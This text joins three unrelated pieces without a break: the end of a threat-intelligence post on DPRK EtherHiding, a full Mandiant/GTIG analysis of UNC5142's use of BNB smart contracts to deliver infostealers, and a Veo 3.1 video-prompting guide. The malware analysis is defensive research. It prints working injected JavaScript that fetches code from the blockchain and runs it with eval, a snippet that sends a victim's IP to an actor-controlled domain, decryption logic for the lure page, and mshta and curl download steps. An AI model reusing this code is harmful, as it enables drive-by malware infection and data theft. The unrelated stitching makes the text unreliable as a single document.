An RPC endpoint is used by UNC5142 (CLEARFAKE) in the EtherHiding activity. This allows direct communication with a BNB Smart Chain node hosted by a third party in a manner that is close to a blockchain node’s “native tongue.”
An API service hosted by a central entity is used by UNC5342 (DPRK), acting as a layer of abstraction between the threat actor and the blockchain.
Though the difference is nuanced, these intermediary services are positioned to directly impact threat actor operations. Another approach not observed in these operations is to operate a node that integrates fully with the blockchain network. Running a full node is resource-intensive, slow to sync, and creates a significant hardware and network footprint that can be traced, making it a cumbersome and risky tool for cyber operations.
Recommendations
EtherHiding presents new challenges as traditional campaigns have usually been halted by blocking known domains and IPs. Malware authors may leverage the blockchain to perform further malware propagation stages since smart contracts operate autonomously and cannot be shut down.
Figure 5: BscScan warning message
While security researchers attempt to warn the community by tagging a contract as malicious on official blockchain scanners (like the warning on BscScan in Figure 5), malicious activity can still be performed.
Chrome Enterprise: Centralized Mitigation
Chrome Enterprise can be a powerful tool to prevent the impact of EtherHiding by using its centralized management capabilities to enforce policies that directly disrupt the attack chain. This approach shifts security away from relying on individual user discretion and into the hands of a centralized, automated system.
The core strength of Chrome Enterprise resides in Chrome Browser Cloud Management. This platform allows administrators to configure and enforce security policies across all managed browsers in their organization, ensuring consistent protection regardless of the user’s location or device.
For EtherHiding, this means an administrator can deploy a defense strategy that does not rely on individual users making the right security decisions.
Key Prevention Policies and Strategies
An administrator can use specific policies to break the EtherHiding attack at multiple points:
1. Block Malicious Downloads
This is the most direct and effective way to stop the attack. The final step of an EtherHiding campaign requires the user to download and run a malicious file (e.g., from a fake update prompt). Chrome Enterprise can prevent this entirely.
DownloadRestrictions Policy: An admin can configure this policy to block downloads of dangerous file types. By setting this policy to block file types like .exe, .msi, .bat, and .dll, the malicious payload can not be saved to the user’s computer, effectively stopping the attack.
2. Automate and Manage Browser Updates
EtherHiding heavily relies on social engineering, most notably by using a pop-up that tells the user “Your Chrome is out of date.” In a managed enterprise environment, this should be an immediate red flag.
Managed Updates: Administrators use Chrome Enterprise to control and automate browser updates. Updates are pushed silently and automatically in the background.
User Training: Because updates are managed, employees can be trained with a simple, powerful message: “You will never be asked to manually update Chrome.” Any prompt to do so is considered a scam and thus undermines the primary social engineering tactic.
3. Control Web Access and Scripts
While attackers constantly change their infrastructure, policies can still reduce the initial attack surface.
URLBlocklistPolicy: Admins can block access to known malicious websites, domains, or even the URLs of blockchain nodes if they are identified by threat intelligence.
Safe Browsing: Policies can enforce Google’s Safe Browsing in its most enhanced mode, which uses real-time threat intelligence to warn users about phishing sites and malicious downloads.
Acknowledgements
This analysis would not have been possible without the assistance from across Google Threat Intelligence Group, including the Koreas Mission, FLARE, and Advanced Practices.
Written by: Mark Magee, Jose Hernandez, Bavi Sadayappan, Jessa Valdez
Since late 2023, Mandiant Threat Defense and Google Threat Intelligence Group (GTIG) have tracked UNC5142, a financially motivated threat actor that abuses the blockchain to facilitate the distribution of information stealers (infostealers).UNC5142 is characterized by its use of compromised WordPress websites and “EtherHiding“, a technique used to obscure malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain. This post is part of a two-part blog series on adversaries using the EtherHiding technique. Read our other post on North Korea (DPRK) adopting EtherHiding.
Since late 2023, UNC5142 has significantly evolved their tactics, techniques, and procedures (TTPs) to enhance operational security and evade detection. Notably, we have not observed UNC5142 activity since late July 2025, suggesting a shift in the actor’s operational methods or a pause in their activity.
UNC5142 appears to indiscriminately target vulnerable WordPress sites, leading to widespread and opportunistic campaigns that impact a range of industry and geographic regions. As of June 2025, GTIG had identified approximately 14,000 web pages containing injected JavaScript consistent with an UNC5142 compromised website. We have seen UNC5142 campaigns distribute infostealers including ATOMIC, VIDAR, LUMMAC.V2, and RADTHIEF. GTIG does not currently attribute these final payloads to UNC5142 as it is possible these payloads are distributed on behalf of other threat actors. This post will detail the full UNC5142 infection chain, analyze its novel use of smart contracts for operational infrastructure, and chart the evolution of its TTPs based on direct observations from Mandiant Threat Defense incidents.
UNC5142 Attack Overview
An UNC5142 infection chain typically involves the following key components or techniques:
CLEARSHORT: A multistage JavaScript downloader to facilitate the distribution of payloads
Compromised WordPress Websites: Websites running vulnerable versions of WordPress, or using vulnerable plugins/themes
Smart Contracts: Self-executing contracts stored on the BNB Smart Chain (BSC) blockchain
EtherHiding: A technique used to obscure malicious code or data by placing it on a public blockchain. UNC5142 relies heavily on the BNB Smart Chain to store its malicious components in smart contracts, making them harder for traditional website security tools to detect and block
Figure 1: CLEARSHORT infection chain
CLEARSHORT
CLEARSHORT is a multistage JavaScript downloader used to facilitate malware distribution. The first stage consists of a JavaScript payload injected into vulnerable websites, designed to retrieve the second-stage payload from a malicious smart contract. The smart contract is responsible for fetching the next stage, a CLEARSHORT landing page, from an external attacker-controlled server. The CLEARSHORT landing page leverages ClickFix, a popular social engineering technique aimed at luring victims to locally run a malicious command using the Windows Run dialog box.
CLEARSHORT is an evolution of the CLEARFAKE downloader, which UNC5142 previously leveraged in their operations from late 2023 through mid-2024. CLEARFAKE is a malicious JavaScript framework that masquerades as a Google Chrome browser update notification. The primary function of the embedded JavaScript is to download a payload after the user clicks the “Update Chrome” button. The second-stage payload is a Base64-encoded JavaScript code stored in a smart contract deployed on the BNB Smart Chain.
Compromised WordPress Sites
The attack begins from the compromise of a vulnerable WordPress website which is exploited to gain unauthorized access. UNC5142 injects malicious JavaScript (CLEARSHORT stage 1) code into one of three locations:
Plugin directories: Modifying existing plugin files or adding new malicious files
Theme files: Modifying theme files (like header.php, footer.php, or index.php) to include the malicious script
Database: In some cases, the malicious code is injected directly into the WordPress database
What is a Smart Contract?
Smart contracts are programs stored on a blockchain, like the BNB Smart Chain (BSC), that run automatically when a specified trigger occurs. While these triggers can be complex, CLEARSHORT uses a simpler method by calling a function that tells the contract to execute and return a pre-stored piece of data.
Smart contracts provide several advantages for threat actors to use in their operations, including:
Obfuscation: Storing malicious code within a smart contract makes it harder to detect with traditional web security tools that might scan website content directly.
Mutability (and Agility): While smart contracts themselves are immutable, the attackers use a clever technique. They deploy a first-level smart contract that contains a pointer to a second-level smart contract. The first-level contract acts as a stable entry point whose address never changes on the compromised website, directing the injected JavaScript to fetch code from a second-level contract, giving the attackers the ability to change this target without altering the compromised website.
Resilience: The use of blockchain technology for large parts of UNC5142’s infrastructure and operation increases their resiliency in the face of detection and takedown efforts. Network based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic given the lack of use of traditional URLs. Seizure and takedown operations are also hindered given the immutability of the blockchain. This is further discussed later in the post.
Leveraging legitimate infrastructure: The BNB Smart Chain is a legitimate platform. Using it can help the malicious traffic blend in with normal activity as a means to evade detection.
Smart Contract Interaction
CLEARSHORT stage 1 uses Web3.js, a collection of libraries that allow interaction with remote ethereum nodes using HTTP, IPC or WebSocket. Typically to connect to the BNB Smart Chain via a public node like bsc-dataseed.binance[.]org. The stage 1 code contains instructions to interact with specific smart contract addresses, and calls functions defined in the contract’s Application Binary Interface (ABI). These functions return payloads, including URLs to the CLEARSHORT landing page. This page is decoded and executed within the browser, displaying a fake error message to the victim. The lure and template of this error message has varied over time, while maintaining the goal to lure the victim to run a malicious command via the Run dialog box. The executed command ultimately results in the download and execution of a follow-on payload, which is often an infostealer.
// Load libraries from public CDNs to intereact with blockchain and decode payloads.
<script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js"></script>
<script>
console.log('Start moving...');
// The main malicious logic starts executing once the webpage's DOM is fully loaded.1st
document.addEventListener('DOMContentLoaded', async () => {
try {
// Establishes a connection to the BNB Smart Chain via a public RPC node.
const web3 = new Web3('https://bsc-dataseed.binance.org/');
// Creates an object to interact with the 1st-Level Smart Contract.
const contract = new web3.eth.Contract([
{
"inputs": [],
"stateMutability": "nonpayable",
"type": "constructor"
},
{
"inputs": [],
"name": "orchidABI", // Returns 2nd contract ABI
"outputs": [{
"internalType": "string",
"name": "",
"type": "string"
}],
"stateMutability": "view",
"type": "function"
},
{
"inputs": [],
"name": "orchidAddress",// Returns 2nd contract address
"outputs": [{
"internalType": "string",
"name": "",
"type": "string"
}],
"stateMutability": "view",
"type": "function"
},
], '0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53'); // Hardcoded address of the 1st-Level Contract.
// ABI is Base64 decoded and then decompressed to get clean ABI.
const orchidABI = JSON.parse(pako.ungzip(Uint8Array.from(atob(await contract.methods.orchidABI().call()), c => c.charCodeAt(0)), {
to: 'string'
}));
// Calls the 'orchidAddress' function to get the address of the 2nd-Level Contract.
const orchidAddress = await contract.methods.orchidAddress().call();
// New contract object created to represent 2nd-level contract.
const orchid = new web3.eth.Contract(orchidABI, orchidAddress);
const decompressedScript = pako.ungzip(Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c => c.charCodeAt(0)), {
to: 'string'
});
eval(`(async () => { ${decompressedScript} })().then(() => { console.log('Moved.'); }).catch(console.error);`);
} catch (error) {
console.error('Road unavaible:', error);
}
});
</script>
Figure 2: Injected code from a compromised website – CLEARSHORT stage 1
When a user visits a compromised web page, the injected JavaScript executes in the browser and initiates a set of connections to one or multiple BNB smart contracts, resulting in the retrieval and rendering of the CLEARSHORT landing page (stage 2) (Figure 3).
A key element of UNC5142’s operations is their use of the EtherHiding technique. Instead of embedding their entire attack chain within the compromised website, they store malicious components on the BNB Smart Chain, using smart contracts as a dynamic configuration and control backend.The on-chain operation is managed by one or more actor-controlled wallets. These Externally Owned Accounts (EOAs) are used to:
Deploy the smart contracts, establishing the foundation of the attack chain.
Supply the BNB needed to pay network fees for making changes to the attack infrastructure.
Update pointers and data within the contracts, such as changing the address of a subsequent contract or rotating the payload decryption keys.
Figure 4: UNC5142’s EtherHiding architecture on the BNB Smart Chain
Evolution of UNC5142 TTPs
Over the past year, Mandiant Threat Defense and GTIG have observed a consistent evolution in UNC5142’s TTPs. Their campaigns have progressed from a single-contract system to the significantly more complex three-level smart contract architecture that enables their dynamic, multi-stage approach beginning in late 2024.
This evolution is characterized by several key shifts: the adoption of a three smart contract system for dynamic payload delivery, the abuse of legitimate services like Cloudflare Pages for hosting malicious lures, and a transition from simple Base64 encoding to AES encryption. The actor has continuously refined its social engineering lures and expanded its infrastructure, at times operating parallel sets of smart contracts to increase both the scale and resilience of their campaigns.
Timeframe
Key Changes
Hosting & Infrastructure
Lure Encoding / Encryption
Notable Lures & Payloads
May 2024
Single smart contract system
.shop TLDs for lures and C2
Base64
Fake Chrome update lures
November 2024
Introduction of the three-smart-contract system
Abuse of Cloudflare *.pages.dev for lures
.shop / .icu domains for recon
AES-GCM + Base64
STUN server for victim IP recon
January 2025
Refinement of the three-contract system
Continued *.pages.dev abuse
AES-GCM + Base64
New lures: Fake reCaptcha, Data Privacy agreements
ATOMIC (macOS), VIDAR
February 2025
Secondary infrastructure deployed
Payload URL stored in smart contract
Expanded use of *.pages.dev and new payload domains
AES-GCM + Base64
New Lure: Cloudflare “Unusual Web Traffic” error
Recon check-in removed, replaced by cookie tracking
March 2025
Active use of both Main and Secondary infrastructure
MediaFire and GitHub for payload hosting
AES-GCM + Base64
Staged POST check-ins to track victim interaction
RADTHIEF, LUMMAC.V2
May 2025
Continued refinement of lures and payload delivery
*.pages.dev for lures, various TLDs for payloads
AES-GCM + Base64
New Lure: “Anti-Bot Verification” for Windows & macOS
Cloudflare Pages Abuse
In late 2024, UNC5142 shifted to the use of the Cloudflare Pages service (*.pages.dev) to host their landing pages; previously they leveraged .shop TLD domains. Cloudflare Pages is a legitimate service maintained by Cloudflare that provides a quick mechanism for standing up a website online, leveraging Cloudflare’s network to ensure it loads swiftly. These pages provide several advantages: Cloudflare is a trusted company, so these pages are less likely to be immediately blocked, and it is easy for the attackers to quickly create new pages if old ones are taken down.
The Three Smart Contract System
The most significant change is the shift from a single smart contract system to a three smart contract system. This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern, which developers use to make their contracts upgradable. A stable, unchangeable proxy forwards calls to a separate second-level contract that can be replaced to fix bugs or add features.
This setup functions as a highly efficient Router-Logic-Storage architecture where each contract has a specific job. This design allows for rapid updates to critical parts of the attack, such as the landing page URL or decryption key, without any need to modify the JavaScript on compromised websites. As a result, the campaigns are much more agile and resistant to takedowns.
1) Initial call to the First-Level contract: The infection begins when the injected JavaScript on a compromised website makes a eth_call to the First-Level Smart Contract (e.g., 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53). The primary function of this contract is to act as a router. Its job is to provide the address and Application Binary Interface (ABI) for the next stage, ensuring attackers rarely need to update the script across their vast network of compromised websites. The ABI data is returned in a compressed and base64 encoded format which the script decodes via atob() and then decompresses using pako.unzip to get the clean interface data.
2) Victim fingerprinting via the Second-Level contract: The injected JavaScript connects to the Second-Level Smart Contract (e.g., 0x8FBA1667BEF5EdA433928b220886A830488549BD). This contract acts as the logic of the attack, containing code to perform reconnaissance actions (Figure 5 and Figure 6). It makes a series of eth_call operations to execute specific functions within the contract to fingerprint the victim’s environment:
teaCeremony (0x9f7a7126), initially served as a method for dynamic code execution and page display. Later it was used for adding and removing POST check-ins.
shibuyaCrossing (0x1ba79aa2), responsible for identifying the victim’s platform or operating system with additional OS/platform values added over time
asakusaTemple (0xa76e7648), initially a placeholder for console log display that later evolved into a beacon for tracking user interaction stages by sending user-agent values
ginzaLuxury (0xa98b06d3), responsible for retrieving the code for finding, fetching, decrypting, and ultimately displaying the malicious lure to the user
The functionality for command and control (C2) check-ins has evolved within the contract:
Late 2024: The script used a STUN server (stun:stun.l.google.com:19302) to obtain the victim’s public IP and sent it to a domain like saaadnesss[.]shoporlapkimeow[.]icu/check.
February 2025: The STUN-based POST check-in was removed and replaced with a cookie-based tracking mechanism (data-ai-collecting) within the teaCeremony (0x9f7a7126) function.
April 2025: The check-in mechanism was reintroduced and enhanced. The asakusaTemple (0xa76e7648) function was modified to send staged POST requests to the domain ratatui[.]today, beaconing at each phase of the lure interaction to track victim progression.
Figure 5: Example of second-level smart contract transaction contents
//Example of code retrieved from the second-level smart contract (IP check and STUN)
if (await new Promise(r => {
let a = new RTCPeerConnection({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
a.createDataChannel("");
a.onicecandidate = e => {
let ip = e?.candidate?.candidate?.match(/d+.d+.d+.d+/)?.[0];
if (ip) {
fetch('https://saaadnesss[.]shop/check', { // Or lapkimeow[.]icu/check
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ ip, domain: location.hostname })
}).then(r => r.json()).then(data => r(data.status));
a.onicecandidate = null;
}
};
a.createOffer().then(o => a.setLocalDescription(o));
}) === "Decline") {
console.warn("Execution stopped: Declined by server");
} else {
await teaCeremony(await orchid.methods.shibuyaCrossing().call(), 2);
await teaCeremony(await orchid.methods.akihabaraLights().call(), 3);
await teaCeremony(await orchid.methods.ginzaLuxury().call(), 4);
await teaCeremony(await orchid.methods.asakusaTemple().call(), 5);
}
3) Lure & payload URL hosting in Third-Level Contract: Once the victim is fingerprinted, the logic in the Second-Level Contract queries the Third-Level Smart Contract (e.g., 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA). This final contract acts as a configuration storage container. It typically contains the URL hosting the encrypted CLEARSHORT payload, the AES key to decrypt the page, and the URL hosting the second stage payload.
Figure 7: Encrypted landing page URL
Figure 8: Payload URL
By separating the static logic (second-level) from the dynamic configuration (third-level), UNC5142 can rapidly rotate domains, update lures, and change decryption keys with a single, cheap transaction to their third-level contract, ensuring their campaign remains effective against takedowns.
How an Immutable Contract Can Be ‘Updated’
A key question that arises is how attackers can update something that is, by definition, unchangeable. The answer lies in the distinction between a smart contract’s code and its data.
Immutable code: Once a smart contract is deployed, its program code is permanent and can never be altered. This is the part that provides trust and reliability.
Mutable data (state): However, a contract can also store data, much like a program uses a database. The permanent code of the contract can include functions specifically designed to change this stored data.
UNC5142 exploits this by having their smart contracts built with special administrative functions. To change a payload URL, the actor uses their controlling wallet to send a transaction that calls one of these functions, feeding it the new URL. The contract’s permanent code executes, receives this new information, and overwrites the old URL in its storage.
From that point on, any malicious script that queries the contract will automatically receive the new, updated address. The contract’s program remains untouched, but its configuration is now completely different. This is how they achieve agility while operating on an immutable ledger.
An analysis of the transactions shows that a typical update, such as changing a lure URL or decryption key in the third-level contract, costs the actor between $0.25 and $1.50 USD in network fees. After the one-time cost of deploying the smart contracts, the initial funding for an operator wallet is sufficient to cover several hundred such updates. This low operational cost is a key enabler of their resilient, high-volume campaigns, allowing them to rapidly adapt to takedowns with minimal expense.
AES-Encrypted CLEARSHORT
In December 2024, UNC5142 introduced AES encryption for the CLEARSHORT landing page, shifting away from Base64-encoded payloads that were used previously. Not only does this reduce the effectiveness of some detection efforts, it also increases the difficulty of analysis of the payload by security researchers. The encrypted CLEARSHORT landing page is typically hosted on a Cloudflare .dev page. The function that decrypts the AES-encrypted landing page uses an initialization vector retrieved from the third smart contract (Figure 9 and Figure 10). The decryption is performed client-side within the victim’s browser.
Figure 9: AES Key within smart contract transaction
// Simplified example of the decryption logic
async function decryptScrollToText(encryptedBase64, keyBase64) {
const key = Uint8Array.from(atob(keyBase64), c => c.charCodeAt(0));
const combinedData = Uint8Array.from(atob(encryptedBase64), c => c.charCodeAt(0));
const iv = combinedData.slice(0, 12); // IV is the first 12 bytes
const encryptedData = combinedData.slice(12);
const cryptoKey = await crypto.subtle.importKey(
"raw", key, "AES-GCM", false, ["decrypt"]
);
const decryptedArrayBuffer = await crypto.subtle.decrypt(
{ name: "AES-GCM", iv },
cryptoKey,
encryptedData
);
return new TextDecoder().decode(decryptedArrayBuffer);
}
// ... (Code to fetch encrypted HTML and key from the third-level contract) ...
if (cherryBlossomHTML) { // cherryBlossomHTML contains the encrypted landing page
try {
let sakuraKey = await JadeContract.methods.pearlTower().call(); // Get the AES key
const decryptedHTML = await decryptScrollToText(cherryBlossomHTML, sakuraKey);
// ... (Display the decrypted HTML in an iframe) ...
} catch (error) {
return;
}
}
Figure 10: Simplified decryption logic
CLEARSHORT Templates and Lures
UNC5142 has used a variety of lures for their landing page, evolving them over time:
January 2025: Lures included fake Data Privacy agreements and reCaptcha turnstiles (Figure 11 and Figure 12).
Figure 11: “Disable Data Collection” CLEARSHORT lure
Figure 12: Fake reCAPTCHA lure
March 2025: The threat cluster began using a lure that mimics a Cloudflare IP web error (Figure 13).
Figure 13: Cloudflare “Unusual Web Traffic” error
May 2025: An “Anti-Bot Lure” was observed, presenting another variation of a fake verification step (Figure 14).
Figure 14: Anti-Bot Lure
On-Chain Analysis
Mandiant Threat Defense’s analysis of UNC5142’s on-chain activity on the BNB Smart Chain reveals a clear and evolving operational strategy. A timeline of their blockchain transactions shows the use of two distinct sets of smart contract infrastructures, which GTIG tracks as the Main and Secondary infrastructures. Both serve the same ultimate purpose, delivering malware via the CLEARSHORT downloader.
Leveraging BNB Smart Chain’s smart contract similarity search, a process where the compiled bytecode of smart contracts is compared to find functional commonalities, revealed that the Main and Secondary smart contracts were identical at the moment of their creation. This strongly indicates that the same threat actor, UNC5142, is responsible for all observed activity. It is highly likely that the actor cloned their successful Main infrastructure to create the foundation for Secondary, which could then be updated via subsequent transactions to deliver different payloads.
Further analysis of the funding sources shows that the primary operator wallets for both groups received funds from the same intermediary wallet (0x3b5a...32D), an account associated with the OKX cryptocurrency exchange. While attribution based solely on transactions from a high-volume exchange wallet requires caution, this financial link, combined with the identical smart contract code and mirrored deployment methodologies, makes it highly likely that a single threat actor, UNC5142, controls both infrastructures.
Parallel Distribution Infrastructures
Transaction records show key events for both groups occurring in close proximity, indicating coordinated management.
On Feb. 18, 2025, not only was the entire Secondary infrastructure created and configured, but the Main operator wallet also received additional funding on the same day. This coordinated funding activity strongly suggests a single actor preparing for and executing an expansion of their operations.
Furthermore, on March 3, 2025, transaction records show that operator wallets for both Main and Secondary infrastructures conducted payload and lure update activities. This demonstrates concurrent campaign management, where the actor was actively maintaining and running separate distribution efforts through both sets of smart contracts simultaneously.
Main
Mandiant Threat Defense analysis pinpoints the creation of the Main infrastructure to a brief, concentrated period on Nov. 24, 2024. The primary Main operator wallet (0xF5B9...71B) was initially funded on the same day with 0.1 BNB (worth approximately $66 USD at the time). Over the subsequent months, this wallet and its associated intermediary wallets received funding on multiple occasions, ensuring the actor had sufficient BNB to cover transaction fees for ongoing operations.
The transaction history for Main infrastructure shows consistent updates over the course of the first half of 2025. Following the initial setup, Mandiant observed payload and lure updates occurring on a near-monthly and at times bi-weekly basis from December 2024 through the end of May 2025. This sustained activity, characterized by frequent updates to the third-level smart contract, demonstrates its role as the primary infrastructure for UNC5142’s campaigns.
Secondary
Mandiant Threat Defense observed a significant operational expansion where the actor deployed the new, parallel Secondary infrastructure. The Secondary operator wallet (0x9AAe...fac9) was funded on Feb. 18, 2025, receiving 0.235 BNB (approximately $152 USD at the time). Shortly after, the entire three-contract system was deployed and configured. Mandiant observed that updates to Secondary infrastructure were active between late February and early March 2025. After this initial period, the frequency of updates to the Secondary smart contracts decreased substantially.
Figure 15: Timeline of UNC5142’s on-chain infrastructure
The Main infrastructure stands out as the core campaign infrastructure, marked by its early creation and steady stream of updates. The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity, test new lures, or simply build operational resilience.
As of this publication, the last observed on-chain update to this infrastructure occurred on July 23, 2025, suggesting a pause in this campaign or a potential shift in the actor’s operational methods.
Final Payload Distribution
Over the past year, Mandiant Threat Defense has observed UNC5142 distribute a wide range of final payloads, including VIDAR, LUMMAC.V2, and RADTHIEF (Figure 16). Given the distribution of a variety of payloads over a range of time, it is possible that UNC5142 functions as a malware distribution threat cluster. Distribution threat clusters play a significant role within the cyber criminal threatscape, providing actors of varying levels of technical sophistication a means to distribute malware and/or gain initial access to victim environments. However, given the consistent distribution of infostealers, it’s also plausible that the threat cluster’s objective is to obtain stolen credentials to facilitate further operations, such as selling the credentials to other threat clusters. While the exact business model of UNC5142 is unclear, GTIG currently does not attribute the final payloads to the threat cluster due to the possibility it is a distribution threat cluster.
Figure 16: UNC5142 final payload distribution over time
An analysis of their infection chains since the beginning of 2025 reveals that UNC5142 follows a repeatable four-stage delivery chain after the initial CLEARSHORT lure:
The initial dropper: The first stage almost always involves the execution of a remote HTML Application (.hta) file, often disguised with a benign file extension like .xll (Excel Add-in). This component, downloaded from a malicious domain or a legitimate file-sharing service, serves as the entry point for executing code on the victim’s system outside the browser’s security sandbox.
The PowerShell loader: The initial dropper’s primary role is to download and execute a second-stage PowerShell script. This script is responsible for defense evasion and orchestrating the download of the final payload.
Abuse of legitimate services: The actor has consistently leveraged legitimate file hosting services such as GitHub and MediaFire to host encrypted data blobs, with some instances observed where final payloads were hosted on their own infrastructure. This tactic helps the malicious traffic blend in with legitimate network activity, bypassing reputation-based security filters.
In-memory execution: In early January, executables were being used to serve VIDAR, but since then, the final malware payload has transitioned to being delivered as an encrypted data blob disguised as a common file type (e.g., .mp4, .wav, .dat). The PowerShell loader contains the logic to download this blob, decrypt it in memory, and execute the final payload (often a .NET loader), without ever writing the decrypted malware to disk.
In earlier infection chains, the URL for the first-stage .hta dropper was often hardcoded directly into the CLEARSHORT lure’s command (e.g., mshta hxxps[:]//…pages.dev). The intermediate PowerShell script would then download the final malware directly from a public repository like GitHub.
January 2025
The actor’s primary evolution was to stop delivering the malware directly as an executable file. Instead, they began hosting encrypted data blobs on services like MediaFire, disguised as media files (.mp4, .mp3). The PowerShell loaders were updated to include decryption routines (e.g., AES, TripleDES) to decode these blobs in memory, revealing a final-stage .NET dropper or the malware itself.
February 2025 & Beyond
The most significant change was the deeper integration of their on-chain infrastructure. Instead of hardcoding the dropper URL in the lure, the CLEARSHORT script began making a direct eth_call to the Third-Level Smart Contract. The smart contract now dynamically provides the URL of the first-stage dropper. This gives the actor complete, real-time control over their post-lure infrastructure; they can change the dropper domain, filename, and the entire subsequent chain by simply sending a single, cheap transaction to their smart contract.
In the infection chain leading to RADTHIEF, Mandiant Threat Defense observed the actor reverting to the older, static method of hardcoding the first-stage URL directly into the lure. This demonstrates that UNC5142 uses a flexible approach, adapting its infection methods to suit each campaign.
Targeting macOS
Notably, the threat cluster has targeted both Windows and macOS systems with their distribution campaigns. In February 2025 and again in April 2025, UNC5142 distributed ATOMIC, an infostealer tailored for macOS. The social engineering lures for these campaigns evolved; while the initial February lure explicitly stated “Instructions For MacOS”, the later April versions were nearly identical to the lures used in their Windows campaigns (Figure 18 and Figure 19). In the February infection chain, the lure prompted the user to run a bash command that retrieved a shell script (Figure 18). This script then used curl to fetch the ATOMIC payload from the remote server hxxps[:]//browser-storage[.]com/update and writes the ATOMIC payload to a file named /tmp/update. (Figure 20). The use of the xattr command within the bash script is a deliberate defense evasion technique designed to remove the com.apple.quarantine attribute, which prevents macOS from displaying the security prompt that normally requires user confirmation before running a downloaded application for the first time.
Figure 18: macOS “Installation Instructions” CLEARSHORT lure from February 2025
Figure 19: macOS “Verification Steps” CLEARSHORT lure from May 2025
Over the past year, UNC5142 has demonstrated agility, flexibility, and an interest in adapting and evolving their operations. Since mid-2024, the threat cluster has tested out and incorporated a wide swath of changes, including the use of multiple smart contracts, AES-encryption of secondary payloads, CloudFlare .dev pages to host landing pages, and the introduction of the ClickFix social engineering technique. It is likely these changes are an attempt to bypass security detections, hinder or complicate analysis efforts, and increase the success of their operations. The reliance on legitimate platforms such as the BNB Smart Chain and Cloudflare pages may lend a layer of legitimacy that helps evade some security detections. Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations. Despite what appears to be a cessation or pause in UNC5142 activity since July 2025, the threat cluster’s willingness to incorporate burgeoning technology and their previous tendencies to consistently evolve their TTPs could suggest they have more significantly shifted their operational methods in an attempt to avoid detection.
Acknowledgements
Special acknowledgment to Cian Lynch for involvement in tracking the malware as a service distribution cluster, and to Blas Kojusner for assistance in analyzing infostealer malware samples. We are also grateful to Geoff Ackerman for attribution efforts, as well as Muhammad Umer Khan and Elvis Miezitis for providing detection opportunities. A special thanks goes to Yash Gupta for impactful feedback and coordination, and to Diana Ion for valuable suggestions on the blog post.
Detection Opportunities
The following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI).
Detection Through Google Security Operations
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity detailed in this blog post is associated with several specific MITRE ATT&CK tactics and techniques, which are detected under the following rule names:
Run Utility Spawning Suspicious Process
Mshta Remote File Execution
Powershell Launching Mshta
Suspicious Dns Lookup Events To C2 Top Level Domains
Suspicious Network Connections To Mediafire
Mshta Launching Powershell
Explorer Launches Powershell Hidden Execution
MITRE ATT&CK
Rule Name
Tactic
Technique
Run Utility Spawning Suspicious Process
TA0003
T1547.001
Mshta Remote File Execution
TA0005
T1218.005
Powershell Launching Mshta
TA0005
T1218.005
Suspicious Dns Lookup Events To C2 Top Level Domains
If a picture is worth a thousand words, a video is worth a million.
For creators, generative video holds the promise of bringing any story or concept to life. However, the reality has often been a frustrating cycle of “prompt and pray” – typing a prompt and hoping for a usable result, with little to no control over character consistency, cinematic quality, or narrative coherence.
This guide is a framework for directing Veo 3.1, our latest model that marks a shift from simple generation to creative control. Veo 3.1 builds on Veo 3, with stronger prompt adherence and improved audiovisual quality when turning images into videos.
What you’ll learn in this guide:
Learn Veo 3.1’s full range of capabilities on Vertex AI.
Implement a formula to direct scenes with consistent characters and styles.
Direct video and sound using professional cinematic techniques.
Execute complex ideas by combining Veo with Gemini 2.5 Flash Image (Nano Banana) in advanced workflows.
Veo 3.1 model capabilities
First, it’s essential to understand the model’s full range of capabilities. Veo 3.1 brings audio to existing capabilities to help you craft the perfect scene. These features are experimental and actively improving, and we’re excited to see what you create as we iterate based on your feedback.
Core generation features:
High-fidelity video: Generate video at 720p or 1080p resolution.
Aspect ratio: 16:9 or 9:16
Variable clip length: Create clips of 4, 6, or 8 seconds.
Rich audio & dialogue: Veo 3.1 excels at generating realistic, synchronized sound, from multi-person conversations to precisely timed sound effects, all guided by the prompt.
Complex scene comprehension: The model has a deeper understanding of narrative structure and cinematic styles, enabling it to better depict character interactions and follow storytelling cues.
Advanced creative controls:
Improved image-to-video: Animate a source image with greater prompt adherence and enhanced audio-visual quality.
Consistent elements with “ingredients to video”: Provide reference images of a scene, character, object, or style to maintain a consistent aesthetic across multiple shots. This feature now includes audio generation.
Seamless transitions with “first and last frame”: Generate a natural video transition between a provided start image and end image, complete with audio.
Add/remove object: Introduce new objects or remove existing ones from a generated video. Veo preserves the scene’s original composition.
Digital watermarking: All generated videos are marked with SynthID to indicate the content is AI-generated.
Note: Add/remove object currently utilizes the Veo 2 model and does not generate audio.
A formula for effective prompts
A structured prompt yields consistent, high-quality results. Consider this five-part formula for optimal control.
Cinematography: Define the camera work and shot composition.
Subject: Identify the main character or focal point.
Action: Describe what the subject is doing.
Context: Detail the environment and background elements.
Style & ambiance: Specify the overall aesthetic, mood, and lighting.
Example prompt: Medium shot, a tired corporate worker, rubbing his temples in exhaustion, in front of a bulky 1980s computer in a cluttered office late at night. The scene is lit by the harsh fluorescent overhead lights and the green glow of the monochrome monitor. Retro aesthetic, shot as if on 1980s color film, slightly grainy.
Prompt: Crane shot starting low on a lone hiker and ascending high above, revealing they are standing on the edge of a colossal, mist-filled canyon at sunrise, epic fantasy style, awe-inspiring, soft morning light.
Prompt: Close-up with very shallow depth of field, a young woman’s face, looking out a bus window at the passing city lights with her reflection faintly visible on the glass, inside a bus at night during a rainstorm, melancholic mood with cool blue tones, moody, cinematic.
Veo 3.1 can generate a complete soundtrack based on your text instructions.
